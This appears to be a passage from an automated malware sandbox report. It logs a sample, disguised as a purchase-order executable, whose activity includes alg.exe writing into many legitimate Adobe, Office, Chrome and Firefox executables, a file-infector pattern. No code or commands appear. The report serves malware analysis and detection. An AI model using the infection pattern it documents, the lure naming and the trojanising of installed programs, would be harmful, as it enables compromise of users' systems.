                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 256512
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 830028
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 829952
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 72028
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 521216
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 1094732
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 1094656
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 321696
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 210944
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 784460
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 784384
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 126840
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 13312
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 586828
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 586752
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 2828
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 4785664
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 5359180
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 5359104
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 2430581
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 632832
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 1206348
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 1206272
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 206444
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 2578944
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 3152460
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 3152384
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 16859
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 1617920
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 2191436
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 2191360
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 860981
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 258048
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 831564
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 831488
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 82352
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 5274624
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 5848140
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 5848064
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 3286540
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 185344
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 758860
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 758784
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 151349
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 26954240
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 27527756
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 27527680
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 11401068
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 4392960
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 4966476
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 4966400
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 2843313
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 1576448
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 2149964
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 2149888
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 574636
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 4318208
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 4891724
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 4891648
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 1700540
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 4318208
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 4891724
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 4891648
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 1700540
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 1404928
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 1978444
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 1978368
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 633260
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 1199616
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 1773132
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 1773056
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 513116
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 248832
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 822348
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 822272
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 121980
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 707072
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 1280588
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 1280512
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 346881
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 666112
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 1239628
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 1239552
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 193089
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 228352
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 801868
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 801792
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 43297
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 762368
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 1335884
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 1335808
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 239297
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 70144
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 643660
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 643584
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
